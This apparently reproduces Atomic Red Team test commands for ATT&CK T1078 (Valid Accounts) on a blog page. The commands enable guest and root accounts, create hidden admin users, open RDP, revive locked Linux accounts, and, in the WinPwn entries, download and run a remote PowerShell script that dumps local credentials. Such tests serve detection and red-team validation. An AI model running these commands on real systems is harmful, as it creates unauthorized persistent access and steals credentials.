1078.001
Enable Guest account with RDP capability and admin privileges
| net user #{guest_user} /active:yes |
| net user #{guest_user} #{guest_password} |
| net localgroup #{local_admin_group} #{guest_user} /add |
| net localgroup "#{remote_desktop_users_group_name}" #{guest_user} /add |
| reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f |
| reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f |
Activate Guest Account
| net user #{guest_user} /active:yes |
Enable Guest Account on macOS
| sudo sysadminctl -guestAccount on |
1078.003
Create local account with admin privileges
| net user art-test /add |
| net user art-test #{password} |
| net localgroup administrators art-test /add |
Create local account with admin privileges - MacOS
| dscl . -create /Users/AtomicUser |
| dscl . -create /Users/AtomicUser UserShell /bin/bash |
| dscl . -create /Users/AtomicUser RealName "Atomic User" |
| dscl . -create /Users/AtomicUser UniqueID 503 |
| dscl . -create /Users/AtomicUser PrimaryGroupID 503 |
| dscl . -create /Users/AtomicUser NFSHomeDirectory /Local/Users/AtomicUser |
| dscl . -passwd /Users/AtomicUser mySecretPassword |
| dscl . -append /Groups/admin GroupMembership AtomicUser |
Create local account with admin privileges using sysadminctl utility - MacOS
| sysadminctl interactive -addUser art-tester -fullName ARTUser -password !pass123! -admin |
Enable root account using dsenableroot utility - MacOS
| dsenableroot #current user |
| dsenableroot -u art-tester -p art-tester -r art-root #new user |
Add a new/existing user to the admin group using dseditgroup utility - macOS
| dseditgroup -o edit -a art-user -t user admin |
WinPwn - Loot local Credentials - powerhell kittie
| $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' |
| iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') |
| obfuskittiedump -consoleoutput -noninteractive |
WinPwn - Loot local Credentials - Safetykatz
| $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' |
| iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') |
| safedump -consoleoutput -noninteractive |
Create local account (Linux)
| useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art |
| su art |
| whoami |
| exit |
Reactivate a locked/expired account (Linux)
| useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art |
| usermod --lock art |
| usermod --expiredate "1" art |
| usermod --unlock art |
| usermod --expiredate "99999" art |
| su art |
| whoami |
| exit |
Login as nobody (Linux)
| cat /etc/passwd |grep nobody |
| # -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin |
| chsh --shell /bin/bash nobody |
| usermod --password $(openssl passwd -1 nobody) nobody |
| su nobody |
| whoami |
| exit |
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· AI与.NET技术实操系列(二):开始使用ML.NET
· 单线程的Redis速度为什么快?
2022-06-28 《数据安全实践指南》- 通用安全实践-数据安全策略规划